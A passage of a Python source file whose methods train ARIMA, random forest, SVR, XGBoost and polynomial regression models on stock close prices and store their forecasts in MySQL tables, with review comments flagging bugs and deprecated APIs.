                    if increase > l_cma and increase >= (highfrllinelong - (highfrllinelong * 0.01)) \
                            and increase > l_ema:
                        increase -= std_days
                        forecast.append(increase)
                    # if CMA and FRL are lower than the forecast,
                    # forecast higher with an aggressive magnitude
                    elif increase <= l_cma or increase <= (
                            highfrllinelong - (highfrllinelong * 0.01)) or increase <= l_ema:
                        increase += 1.5 * std_days
                        forecast.append(increase)
            forecastDateStr = "'" + str(future_dates['date'][i]) + "'"
            # Send the addition of new variables to SQL;
            # predicted-value error is 0 because actual close prices for the future are not available
            predError = 0
            insert_query = insert_query.format(forecastDateStr, ID, forecast[i], algoCode, predError)
            self.engine.execute(insert_query)
"""Look into why warnings due to incorrect inputs"""
def calculate_arima_forecast(self):
    """
    Calculate historic next-day returns based on an ARIMA forecast model
    and 10 days of future price forecast.
    Store results in dbo_AlgorithmForecast.
    Historical back-testing uses a rolling 10-day close window; the future
    forecast is fit on the prior 50 business days' close prices.
    """
    # retrieve InstrumentsMaster table from database
    query = 'SELECT * FROM {}'.format(self.table_name)
    df = pd.read_sql_query(query, self.engine)
    algoCode = "'ARIMA'"
    # add code to database if it doesn't exist
    code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
    count = pd.read_sql_query(code_query, self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'ARIMA'"
        insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
        self.engine.execute(insert_code_query)
    # loop through each ticker symbol
    for ID in df['instrumentid']:
        # remove all future prediction dates (rows with prederror=0)
        remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
                              'instrumentid={}'.format(algoCode, ID)
        self.engine.execute(remove_future_query)
        # find the latest forecast date
        date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
                     'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
        latest_date = pd.read_sql_query(date_query, self.engine)  # most recent forecast date calculation
        # if table has forecast prices already find the latest one and delete it;
        # need to use most recent data for today if run before market close at 4pm
        if not latest_date.empty:
            latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
            delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
                           'forecastdate={}'.format(algoCode, ID, latest_date_str)
            self.engine.execute(delete_query)
        # get raw price data from database
        data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
        data = pd.read_sql_query(data_query, self.engine)
        """Below here to look at for ARIMA warnings and to tweak"""
        # training data size
        # IF THIS CHANGES ALL PREDICTIONS STORED IN DATABASE BECOME INVALID!
        input_length = 10
        for n in range((input_length-1), len(data)):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            # populate entire table if empty
            # or add new dates based on information in Statistics table
            if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
                # rolling window of the 9 prior closes (the pandas slice keeps
                # the original integer index, so labels run n-9 .. n-1)
                training_data = data['close'][n-(input_length-1):n]
                # NOTE(review): this is statsmodels' legacy ARIMA
                # (statsmodels.tsa.arima_model, with the `disp` fit argument);
                # removed in newer statsmodels releases - confirm the pinned version.
                arima = ARIMA(training_data, order=(0,1,0))  # most suited order combination after many trials
                fitted_arima = arima.fit(disp=-1)  # disp=-1 suppresses optimizer output
                # fittedvalues is indexed by the original labels, so [n-1] is
                # the last in-sample one-step value
                forecastClose = data['close'][n] + fitted_arima.fittedvalues[n-1]
                predError = 100 * abs(forecastClose - data['close'][n]) / data['close'][n]
                forecastDate = "'" + str(data['date'][n]) + "'"
                insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
                self.engine.execute(insert_query)
        # training and test data set sizes
        forecast_length = 10
        forecast_input = 50
        # find ARIMA model for future price movements, fit on the last 50 closes
        training_data = data['close'][-forecast_input:]
        model = ARIMA(training_data, order=(0, 1, 0))
        fitted = model.fit(disp=0)
        # 10-step-ahead forecast with a 50% confidence interval
        fc, se, conf = fitted.forecast(forecast_length, alpha=0.5)
        # NOTE(review): forecastDate is only assigned inside the if-branch of
        # the loop above; if no new rows were processed this raises NameError.
        forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
                               'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
        future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
        # insert prediction into database
        date = data['date'][n]  # NOTE(review): assigned but never used
        for n in range(0, forecast_length):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            forecastClose = fc[n]
            predError = 0  # no actual close price exists yet for future dates
            forecastDate = "'" + str(future_dates['date'][n]) + "'"
            insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
            self.engine.execute(insert_query)
def calculate_random_forest_forecast(self):
    """
    Calculate historic next-day returns based on a Random Forest forecast
    model plus 10 days of future price forecast.
    Store results in the dbo_AlgorithmForecast table in the database.
    """
    # retrieve InstrumentsMaster table from database
    query = 'SELECT * FROM {}'.format(self.table_name)
    df = pd.read_sql_query(query, self.engine)
    algoCode = "'RandomForest'"
    # add code to database if it doesn't exist
    code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
    count = pd.read_sql_query(code_query, self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'RandomForest'"
        insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
        self.engine.execute(insert_code_query)
    # loop through each ticker symbol
    for ID in df['instrumentid']:
        # remove all future prediction dates - these need to be recalculated daily
        remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
                              'instrumentid={}'.format(algoCode, ID)
        self.engine.execute(remove_future_query)
        # find the latest forecast date
        date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
                     'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
        latest_date = pd.read_sql_query(date_query, self.engine)  # most recent forecast date calculation
        # if table has forecast prices already find the latest one and delete it;
        # need to use most recent data for today if run before market close at 4pm
        if not latest_date.empty:
            latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
            delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
                           'forecastdate={}'.format(algoCode, ID, latest_date_str)
            self.engine.execute(delete_query)
        # get raw price data from database
        data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
        data = pd.read_sql_query(data_query, self.engine)
        # training data size
        # IF THIS CHANGES ALL PREDICTIONS STORED IN DATABASE BECOME INVALID!
        input_length = 10
        for n in range((input_length - 1), len(data)):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            # populate entire table if empty
            # or add new dates based on information in Statistics table
            if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
                # historical next-day random forest forecast:
                # features are just the day offsets 0..8, targets the 9 prior closes
                x_train = [i for i in range(input_length-1)]
                y_train = data['close'][n - (input_length - 1):n]
                x_test = [input_length-1]
                x_train = np.array(x_train)
                y_train = np.array(y_train)
                x_test = np.array(x_test)
                # reshape to column vectors (n_samples, 1) for the sklearn API
                x_train = x_train.reshape(-1, 1)
                x_test = x_test.reshape(-1, 1)
                clf_rf = RandomForestRegressor(n_estimators=100)  # meta estimator with classifying decision trees
                clf_rf.fit(x_train, y_train)  # x and y train fit into classifier
                forecastClose = clf_rf.predict(x_test)[0]
                predError = 100 * abs(forecastClose-data['close'][n])/data['close'][n]  # standard MBE formula
                forecastDate = "'" + str(data['date'][n]) + "'"
                insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
                self.engine.execute(insert_query)
        # training and test data set sizes
        forecast_length = 10
        forecast_input = 50
        # find Random Forest model for future price movements:
        # train on the last 50 closes at offsets 0..49, predict offsets 0..9
        x_train = [i for i in range(forecast_input)]
        y_train = data['close'][-forecast_input:]
        x_test = [i for i in range(forecast_length)]
        x_train = np.array(x_train)
        y_train = np.array(y_train)
        x_test = np.array(x_test)
        x_train = x_train.reshape(-1, 1)
        x_test = x_test.reshape(-1, 1)
        clf_rf = RandomForestRegressor(n_estimators=100)
        clf_rf.fit(x_train, y_train)
        forecast = clf_rf.predict(x_test)
        # NOTE(review): forecastDate is only assigned inside the if-branch of
        # the loop above; if no new rows were processed this raises NameError.
        forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
                               'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
        future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
        # insert prediction into database
        date = data['date'][n]  # NOTE(review): assigned but never used
        for n in range(0, forecast_length):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            forecastClose = forecast[n]
            predError = 0  # no actual close price exists yet for future dates
            forecastDate = "'" + str(future_dates['date'][n]) + "'"
            insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
            self.engine.execute(insert_query)
"""Delete Forecast old"""
def calculate_forecast_old(self):
    """
    Legacy (Winter 2019 or earlier) traditional one-day forecast.

    Calculates historic one-day returns and stores them in
    dbo_algorithmforecast. Unlike the improved `PricePred` algorithm, this
    version feeds each day's *actual* close price (known only after the
    market closes) into the prediction of that same day's close, so it is
    kept purely for comparison. The prior 10 days of close prices drive
    each prediction.
    """
    # instrument master table: one row per ticker symbol
    instruments = pd.read_sql_query('SELECT * FROM {}'.format(self.table_name), self.engine)

    algoCode = "'PricePredOld'"

    # register the algorithm code on first use
    count = pd.read_sql_query(
        'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode,
        self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'PricePredictionOld'"
        self.engine.execute(
            'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName))

    for instrument_id in instruments['instrumentid']:
        # drop rows flagged as future predictions (prederror=0)
        self.engine.execute(
            'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND '
            'instrumentid={}'.format(algoCode, instrument_id))

        # most recent forecast date already stored for this instrument
        last_forecast = pd.read_sql_query(
            'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} '
            'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, instrument_id),
            self.engine)

        # recompute the newest stored forecast: before the 4pm market close
        # today's data may still change
        if not last_forecast.empty:
            newest = "'" + str(last_forecast['forecastdate'][0]) + "'"
            self.engine.execute(
                'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND '
                'forecastdate={}'.format(algoCode, instrument_id, newest))

        # raw close-price history, oldest first
        prices = pd.read_sql_query(
            'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % instrument_id,
            self.engine)

        # prediction formula inputs
        # IF THESE CHANGE ALL RELATED PREDICTIONS STORED IN DATABASE BECOME INVALID!
        momentum = 5
        sDev = 10
        ma = 10
        start = max(momentum, sDev, ma)

        # derived inputs for the prediction formula
        prices['momentum'] = prices['close'].diff(momentum)
        prices['stDev'] = prices['close'].rolling(sDev).std()
        prices['movAvg'] = prices['close'].rolling(ma).mean()

        # predictions become possible after 'start' (10) days of history
        for row in range(start, len(prices)):
            # fill the whole table when empty, otherwise only append newer dates
            if not (last_forecast.empty or last_forecast['forecastdate'][0] <= prices['date'][row]):
                continue
            # shift the close up or down by a 99% confidence band,
            # direction chosen by the sign of the momentum
            band = 2.576 * prices['stDev'][row] / sqrt(sDev)
            direction = 1 if prices['momentum'][row] >= 0 else -1
            forecastClose = prices['close'][row] + direction * band
            predError = 100 * abs(forecastClose - prices['close'][row]) / prices['close'][row]
            forecastDate = "'" + str(prices['date'][row]) + "'"
            # store the new prediction
            self.engine.execute(
                'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'.format(
                    forecastDate, instrument_id, forecastClose, algoCode, predError))
"""Use these forecast to generate buy sell signals"""
def calculate_svm_forecast(self):
    """
    Calculate historic next-day returns based on SVM (support vector
    regression) and 10 days of future price forecast.
    Store results in dbo_AlgorithmForecast.
    Each historical prediction is made from the prior 10 business days'
    close prices; the future forecast trains on the last 50 closes.
    """
    # retrieve InstrumentsMaster table from database
    query = 'SELECT * FROM {}'.format(self.table_name)
    df = pd.read_sql_query(query, self.engine)
    algoCode = "'svm'"
    # add code to database if it doesn't exist
    code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
    count = pd.read_sql_query(code_query, self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'SVM'"
        insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
        self.engine.execute(insert_code_query)
    # loop through each ticker symbol
    # NOTE(review): this method uses CamelCase table/column names
    # (dbo_AlgorithmForecast, InstrumentID, ...) while sibling methods use
    # lowercase - confirm the database is case-insensitive about identifiers.
    for ID in df['instrumentid']:
        # remove all future prediction dates - these need to be recalculated daily
        remove_future_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND PredError=0 AND ' \
                              'InstrumentID={}'.format(algoCode, ID)
        self.engine.execute(remove_future_query)
        # find the latest forecast date
        date_query = 'SELECT ForecastDate FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} ' \
                     'ORDER BY ForecastDate DESC LIMIT 1'.format(algoCode, ID)
        latest_date = pd.read_sql_query(date_query, self.engine)  # most recent forecast date calculation
        # if table has forecast prices already find the latest one and delete it;
        # need to use most recent data for today if run before market close at 4pm
        if not latest_date.empty:
            latest_date_str = "'" + str(latest_date['ForecastDate'][0]) + "'"
            delete_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} AND ' \
                           'ForecastDate={}'.format(algoCode, ID, latest_date_str)
            self.engine.execute(delete_query)
        # get raw price data from database
        data_query = 'SELECT Date, Close FROM dbo_InstrumentStatistics WHERE InstrumentID=%s ORDER BY Date ASC' % ID
        data = pd.read_sql_query(data_query, self.engine)
        # training data size
        # IF THIS CHANGES ALL PREDICTIONS STORED IN DATABASE BECOME INVALID!
        input_length = 10
        for n in range((input_length - 1), len(data)):
            insert_query = 'INSERT INTO dbo_AlgorithmForecast VALUES ({}, {}, {}, {}, {})'
            # populate entire table if empty
            # or add new dates based on information in Statistics table
            if latest_date.empty or latest_date['ForecastDate'][0] <= data['Date'][n]:
                # historical next-day forecast:
                # features are just the day offsets 0..8, targets the 9 prior closes
                x_train = [i for i in range(input_length-1)]
                y_train = data['Close'][n - (input_length - 1):n]
                x_test = [input_length-1]
                x_train = np.array(x_train)
                y_train = np.array(y_train)
                x_test = np.array(x_test)
                # reshape to column vectors (n_samples, 1) for the sklearn API
                x_train = x_train.reshape(-1, 1)
                x_test = x_test.reshape(-1, 1)
                clf_svr = SVR(kernel='rbf', C=1e3, gamma=0.1)
                clf_svr.fit(x_train, y_train)
                forecastClose = clf_svr.predict(x_test)[0]
                predError = 100 * abs(forecastClose-data['Close'][n])/data['Close'][n]
                forecastDate = "'" + str(data['Date'][n]) + "'"
                insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
                self.engine.execute(insert_query)
        # training and test data set sizes
        forecast_length = 10
        forecast_input = 50
        # Train SVR model for future price movements (the original comment said
        # "Random Forest", but an SVR is trained below)
        x_train = [i for i in range(forecast_input)]
        y_train = data['Close'][-forecast_input:]
        x_test = [i for i in range(forecast_length)]
        x_train = np.array(x_train)
        y_train = np.array(y_train)
        x_test = np.array(x_test)
        x_train = x_train.reshape(-1, 1)
        x_test = x_test.reshape(-1, 1)
        clf_svr = SVR(kernel='rbf', C=1e3, gamma=0.1)
        clf_svr.fit(x_train, y_train)
        forecast = clf_svr.predict(x_test)
        # NOTE(review): forecastDate is only assigned inside the if-branch of
        # the loop above; if no new rows were processed this raises NameError.
        forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
                               'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
        future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
        # insert prediction into database
        for n in range(0, forecast_length):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            forecastClose = forecast[n]
            predError = 0  # no actual close price exists yet for future dates
            forecastDate = "'" + str(future_dates['date'][n]) + "'"
            insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
            self.engine.execute(insert_query)
def calculate_xgboost_forecast(self):
    """
    Calculate historic next-day returns based on XGBoost and 10 days of
    future price forecast.
    Store results in dbo_AlgorithmForecast.
    Historical predictions use a rolling 10-day close window; the future
    forecast trains on the last 50 closes.
    """
    # retrieve InstrumentsMaster table from database
    query = 'SELECT * FROM {}'.format(self.table_name)
    df = pd.read_sql_query(query, self.engine)
    algoCode = "'xgb'"
    # add code to database if it doesn't exist
    code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
    count = pd.read_sql_query(code_query, self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'xgb'"
        insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
        self.engine.execute(insert_code_query)
    # loop through each ticker symbol
    for ID in df['instrumentid']:
        # remove all future prediction dates - these need to be recalculated daily
        remove_future_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND PredError=0 AND ' \
                              'InstrumentID={}'.format(algoCode, ID)
        self.engine.execute(remove_future_query)
        # find the latest forecast date
        date_query = 'SELECT ForecastDate FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} ' \
                     'ORDER BY ForecastDate DESC LIMIT 1'.format(algoCode, ID)
        latest_date = pd.read_sql_query(date_query, self.engine)  # most recent forecast date calculation
        # if table has forecast prices already find the latest one and delete it;
        # need to use most recent data for today if run before market close at 4pm
        if not latest_date.empty:
            latest_date_str = "'" + str(latest_date['ForecastDate'][0]) + "'"
            delete_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} AND ' \
                           'ForecastDate={}'.format(algoCode, ID, latest_date_str)
            self.engine.execute(delete_query)
        # get raw price data from database
        data_query = 'SELECT Date, Close FROM dbo_InstrumentStatistics WHERE InstrumentID=%s ORDER BY Date ASC' % ID
        data = pd.read_sql_query(data_query, self.engine)
        # training data size
        # IF THIS CHANGES ALL RELATED PREDICTIONS STORED IN THE DATABASE BECOME INVALID!
        input_length = 10
        for n in range((input_length - 1), len(data)):
            insert_query = 'INSERT INTO dbo_AlgorithmForecast VALUES ({}, {}, {}, {}, {})'
            # populate entire table if empty
            # or add new dates based on information in Statistics table
            if latest_date.empty or latest_date['ForecastDate'][0] <= data['Date'][n]:
                # historical next-day forecast:
                # features are just the day offsets 0..8, targets the 9 prior closes
                x_train = [i for i in range(input_length-1)]
                y_train = data['Close'][n - (input_length - 1):n]
                x_test = [input_length-1]
                x_train = np.array(x_train)
                y_train = np.array(y_train)
                x_test = np.array(x_test)
                # reshape to column vectors (n_samples, 1) for the fit/predict API
                x_train = x_train.reshape(-1, 1)
                x_test = x_test.reshape(-1, 1)
                # XG BOOST Regressor with tree depth, subsample ratio of tree growth...etc.
                # NOTE(review): objective "reg:linear" is deprecated in newer
                # XGBoost releases in favor of "reg:squarederror" - confirm the
                # pinned xgboost version.
                xg_reg = xgb.XGBRegressor(max_depth=3, learning_rate=0.30, n_estimators=15,
                                          objective="reg:linear", subsample=0.5,
                                          colsample_bytree=0.8, seed=10)
                xg_reg.fit(x_train, y_train)
                forecastClose = xg_reg.predict(x_test)[0]
                predError = 100 * abs(forecastClose-data['Close'][n])/data['Close'][n]
                forecastDate = "'" + str(data['Date'][n]) + "'"
                insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
                self.engine.execute(insert_query)
        # training and test data set sizes
        forecast_length = 10
        forecast_input = 50
        # find XG BOOST model for future price movements:
        # train on the last 50 closes at offsets 0..49, predict offsets 0..9
        x_train = [i for i in range(forecast_input)]
        y_train = data['Close'][-forecast_input:]
        x_test = [i for i in range(forecast_length)]
        x_train = np.array(x_train)
        y_train = np.array(y_train)
        x_test = np.array(x_test)
        x_train = x_train.reshape(-1, 1)
        x_test = x_test.reshape(-1, 1)
        # XGBoost Regressor Predictions added 11/16/19
        xg_reg = xgb.XGBRegressor(max_depth=3, learning_rate=0.30, n_estimators=15,
                                  objective="reg:linear", subsample=0.5,
                                  colsample_bytree=0.8, seed=10)
        xg_reg.fit(x_train, y_train)
        forecast = xg_reg.predict(x_test)
        # NOTE(review): forecastDate is only assigned inside the if-branch of
        # the loop above; if no new rows were processed this raises NameError.
        forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
                               'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
        future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
        # insert prediction into MySQL database
        # predError will be 0, there are no close prices available for future dates
        for n in range(0, forecast_length):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            forecastClose = forecast[n]
            predError = 0
            forecastDate = "'" + str(future_dates['date'][n]) + "'"
            insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
            self.engine.execute(insert_query)
def calculate_regression(self):
    """
    Fit a rolling degree-4 polynomial regression over each instrument's daily
    closes and insert short-horizon price forecasts into dbo_algorithmforecast
    under algorithm code 'regression'.

    Algorithm's accuracy is... questionable.

    Side effects: reads and writes several dbo_* tables via self.engine.
    NOTE(review): all SQL is assembled with string formatting; the values come
    from our own tables, but parameterized queries would be safer — confirm
    before exposing any of these inputs externally.
    """
    # retrieve InstrumentsMaster table from database
    query = 'SELECT * FROM {}'.format(self.table_name)
    df = pd.read_sql_query(query, self.engine)
    algoCode = "'regression'"
    # add code to database if it doesn't exist
    code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
    count = pd.read_sql_query(code_query, self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'PolynomialRegression'"
        insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
        self.engine.execute(insert_code_query)
    # loop through each ticker symbol
    for ID in df['instrumentid']:
        # remove all future prediction dates (future rows are stored with prederror=0)
        remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
                              'instrumentid={}'.format(algoCode, ID)
        self.engine.execute(remove_future_query)
        # find the latest forecast date
        date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
                     'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
        latest_date = pd.read_sql_query(date_query, self.engine)  # most recent forecast date calculation
        # if table has forecast prices already find the latest one and delete it
        # need to use most recent data for today if before market close at 4pm
        if not latest_date.empty:
            latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
            delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
                           'forecastdate={}'.format(algoCode, ID, latest_date_str)
            self.engine.execute(delete_query)
        # get raw price data from database
        data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
        data = pd.read_sql_query(data_query, self.engine)
        # regression window: number of previous days fed to each fit
        input_length = 20
        # number of trading days to predict ahead
        forecast_length = 5
        for n in range(input_length, len(data)):
            recent_data = data[n - input_length:n]
            # get most recent trading day of the current window
            forecastDate = "'" + str(data['date'][n]) + "'"
            # x and y axis
            x_axis = np.array(recent_data['date'])
            y_axis = np.array(recent_data['close'])
            # convert date to an ordinal value to allow for regression
            # NOTE(review): `df` is rebound here, shadowing the instrument-master
            # frame read above; the outer `for ID in df['instrumentid']` already
            # holds its iterator, so iteration itself is unaffected.
            df = pd.DataFrame({'date': x_axis, 'close': y_axis})
            df['date'] = pd.to_datetime(df['date'])
            df['date'] = df['date'].map(dt.datetime.toordinal)
            X = np.array(df['date'])
            X = np.array(X)
            X = X.reshape(-1, 1)
            y = np.array(df['close'])
            # degree-4 polynomial features + linear fit over the window
            poly_reg = PolynomialFeatures(degree=4)
            X_poly = poly_reg.fit_transform(X)
            pol_reg = LinearRegression()
            pol_reg.fit(X_poly, y)
            # plt.scatter(X, y, color='red')
            # plt.plot(X, pol_reg.predict(poly_reg.fit_transform(X)), color='blue')
            # plt.title('Prediction')
            # plt.xlabel('Date')
            # plt.ylabel('Percentage Change')
            # plt.show()
            # next `forecast_length` trading days (skipping weekends/holidays)
            # NOTE(review): running this query + delete + inserts once per window
            # is assumed intentional (each window overwrites forecasts beyond its
            # date) — confirm; it is a large number of round-trips per instrument.
            forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
                                   'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
            future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
            # delete outdated forecasts for the next period
            delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
                           'forecastdate>{}'.format(algoCode, ID, forecastDate)
            self.engine.execute(delete_query)
            # NOTE(review): this inner loop reuses `n`; the enclosing `for n`
            # continues from its own iterator so this is safe in Python, but a
            # distinct name would be clearer.
            for n in range(len(future_dates)):
                insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
                forecastDate = future_dates['date'][n]
                ordinalDate = forecastDate.toordinal()
                forecastDate = "'" + str(future_dates['date'][n]) + "'"
                forecastClose = pol_reg.predict(poly_reg.fit_transform([[ordinalDate]]))
                forecastClose = (round(forecastClose[0], 3))
                # populate entire table if empty
                # or add new dates based on information in Statistics table
                # predError is 0: there are no close prices for future dates
                insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, 0)
                self.engine.execute(insert_query)
def MSF1(self):
    """
    Macro Statistical Forecast 1.

    For every instrument, forecast quarterly closing prices for the next n
    quarters from the average percent change of each active macroeconomic
    variable, then store the median of the per-variable forecasts in the
    dbo_macroeconalgorithmforecast table (algorithmcode 'MSF1').

    Side effects: REPLACES dbo_macroeconalgorithmforecast and runs
    FinsterTab.W2020.AccuracyTest.MSF1_accuracy against self.engine.
    """
    # Queries the database to grab all of the Macro Economic Variable codes
    # (NOTE: `id` shadows the builtin; name kept to match the rest of the file)
    query = "SELECT macroeconcode FROM dbo_macroeconmaster WHERE activecode = 'A'"
    id = pd.read_sql_query(query, self.engine)
    id = id.reset_index(drop=True)
    # Queries the database to grab all of the instrument IDs
    query = 'SELECT instrumentid FROM dbo_instrumentmaster'
    id2 = pd.read_sql_query(query, self.engine)
    id2 = id2.reset_index(drop=True)
    # Number of quarterly datapoints to work with (history depth and horizon)
    n = 9

    # --- Getting Dates for Future Forecast ---
    currentDate = datetime.today()
    # List of future quarter-end forecast dates
    date = []
    # Seed `count` with the current quarter so no past forecast dates are produced
    if currentDate.month < 4:
        count = 0
    elif currentDate.month < 7:
        count = 1
    elif currentDate.month < 10:
        count = 2
    else:
        count = 3
    # Initialize a variable to the current year
    year = currentDate.year
    # Prints out the accuracy figures; not necessary, can be commented out
    FinsterTab.W2020.AccuracyTest.MSF1_accuracy(self.engine)
    # Append one quarter-end date per datapoint, rolling the year after Q4
    for i in range(n):
        if count == 0:
            date.append(str(year) + "-03-31")
            count += 1
        elif count == 1:
            date.append(str(year) + "-06-30")
            count += 1
        elif count == 2:
            date.append(str(year) + "-09-30")
            count += 1
        else:
            date.append(str(year) + "-12-31")
            count = 0
            year = year + 1

    # Rows destined for the dbo_macroeconalgorithmforecast table
    data = []
    for v in id2['instrumentid']:
        # median_forecast maps forecast date -> prices predicted by each macro variable
        median_forecast = {}
        for i in date:
            median_forecast.update({i: []})
        # Today's date, quoted so MySQL reads it as a string
        currentDate = str(datetime.today())
        currentDate = ("'" + currentDate + "'")
        # Quarterly instrument prices between 2014 and today (last close of
        # each quarter-end month)
        query = "SELECT close, instrumentid FROM ( SELECT date, close, instrumentID, ROW_NUMBER() OVER " \
                "(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
                "dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
                "WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
                "MONTH(z.date) = 12)".format(v, currentDate)
        df2 = pd.read_sql_query(query, self.engine)
        # Compute the percent change of each macroeconomic variable
        for x in id['macroeconcode']:
            query = 'SELECT * FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format('"' + str(x) + '"')
            df = pd.read_sql_query(query, self.engine)
            macro = df.tail(n)
            SP = df2.tail(n)
            temp = df.tail(n + 1)
            temp = temp.reset_index()
            # Converts macro variables to percent change
            macroPercentChange = macro
            macro = macro.reset_index(drop=True)
            SP = SP.reset_index(drop=True)
            macroPercentChange = macroPercentChange.reset_index(drop=True)
            for i in range(0, n):
                if i == 0:
                    # Oldest point: percent change against the (n+1)th statistic
                    macrov = (macro['statistics'][i] - temp['statistics'][i]) / temp['statistics'][i]
                else:
                    macrov = (macro['statistics'][i] - macro['statistics'][i - 1]) / macro['statistics'][i - 1]
